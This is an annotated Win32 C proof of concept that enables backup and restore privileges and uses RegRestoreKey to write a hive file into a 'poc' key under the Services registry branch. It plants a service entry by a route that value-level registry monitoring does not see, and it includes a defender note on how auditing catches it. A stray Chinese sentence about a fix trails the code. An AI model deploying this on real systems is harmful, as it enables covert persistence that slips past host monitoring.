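/*
 * Registry hive save/restore helpers (Win32).
 *
 * Notes on this listing:
 *  - main() passes narrow string literals to the LPCSTR / TCHAR parameters and
 *    to the generic-named registry APIs (RegOpenKeyEx, RegSaveKey, ...), so
 *    the code only builds as a non-UNICODE (ANSI) target.
 *  - The original text had the two token access flags fused by an unrelated
 *    insertion; the mask is restored to TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY.
 *  - DumpReg and RestoreReg tested their registry call with "!= ERROR_SUCCESS"
 *    before setting bRet = TRUE, i.e. they reported TRUE on *failure*.  Both
 *    now return TRUE only when the call succeeded.
 */

/*
 * Enable one named privilege (for example SE_BACKUP_NAME) on the current
 * process token.
 *
 * lpName: privilege name as understood by LookupPrivilegeValue.
 * Returns TRUE only when the privilege is actually enabled.
 *
 * AdjustTokenPrivileges returns nonzero even when the token does not hold the
 * privilege (it then reports ERROR_NOT_ALL_ASSIGNED via GetLastError), so the
 * result is confirmed with GetLastError() == ERROR_SUCCESS; the original
 * trusted the bare return value.
 */
BOOL EnableDebugPriv(LPCTSTR lpName)
{
    BOOL bRet = FALSE;
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp = {0};
    LUID luid;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    if (LookupPrivilegeValue(NULL, lpName, &luid)) {
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        /* No previous-state buffer is requested, hence the two NULLs. */
        if (AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, NULL, NULL)
            && GetLastError() == ERROR_SUCCESS) {
            bRet = TRUE;
        }
    }

    CloseHandle(hToken);
    return bRet;
}

/*
 * Save the subkey lpSubKey of hKey into the hive file szFilePath with
 * RegSaveKey.  SeBackupPrivilege is enabled first; without it the save fails.
 *
 * Returns TRUE when the hive file was written, FALSE otherwise.
 *
 * KEY_ALL_ACCESS is kept from the original; a narrower mask may be enough
 * for a save (the privilege, not the mask, is what RegSaveKey relies on) --
 * verify before tightening.
 */
BOOL DumpReg(HKEY hKey, LPCSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;

    if (!EnableDebugPriv(SE_BACKUP_NAME)) {
        return FALSE;
    }

    /* ulOptions is a DWORD; the original passed NULL (a pointer constant). */
    if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) == ERROR_SUCCESS) {
        bRet = (RegSaveKey(hCur, szFilePath, NULL) == ERROR_SUCCESS);
        RegCloseKey(hCur);
    }
    return bRet;
}

/*
 * Replace the subkey lpSubKey of hKey with the contents of the hive file
 * szFilePath (RegRestoreKey with REG_FORCE_RESTORE).  The subkey is created
 * if it does not exist.  SeRestorePrivilege is enabled first.
 *
 * Returns TRUE when the restore succeeded, FALSE otherwise.
 *
 * Defender note: this write path does not go through RegSetValueEx /
 * RegCreateKeyEx for the individual values; monitoring that keys only on the
 * value-set APIs will not see it.  Privilege-use auditing (SeRestorePrivilege)
 * and object auditing on the target key do cover it.
 */
BOOL RestoreReg(HKEY hKey, LPCSTR lpSubKey, TCHAR szFilePath[MAX_PATH])
{
    BOOL bRet = FALSE;
    HKEY hCur = NULL;

    if (!EnableDebugPriv(SE_RESTORE_NAME)) {
        return FALSE;
    }

    /* Open the existing subkey; fall back to creating it. */
    if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &hCur) != ERROR_SUCCESS
        && RegCreateKey(hKey, lpSubKey, &hCur) != ERROR_SUCCESS) {
        return FALSE;
    }

    bRet = (RegRestoreKey(hCur, szFilePath, REG_FORCE_RESTORE) == ERROR_SUCCESS);
    RegCloseKey(hCur);
    return bRet;
}

/*
 * Entry point.  The exit status now reflects the result of RestoreReg
 * (0 on success, 1 on failure); the original discarded it.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* Step 1 (run once, locally): save the Services\poc subkey to a hive
     * file.  Left commented out, as in the original. */
    /* DumpReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\poc", "C:\\poc.hiv"); */

    /* Step 2: load that hive back into the Services\poc subkey. */
    return RestoreReg(HKEY_LOCAL_MACHINE,
                      "SYSTEM\\CurrentControlSet\\Services\\poc",
                      "C:\\poc.hiv") ? 0 : 1;
}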
修复方案：牺牲点用户体验吧。
……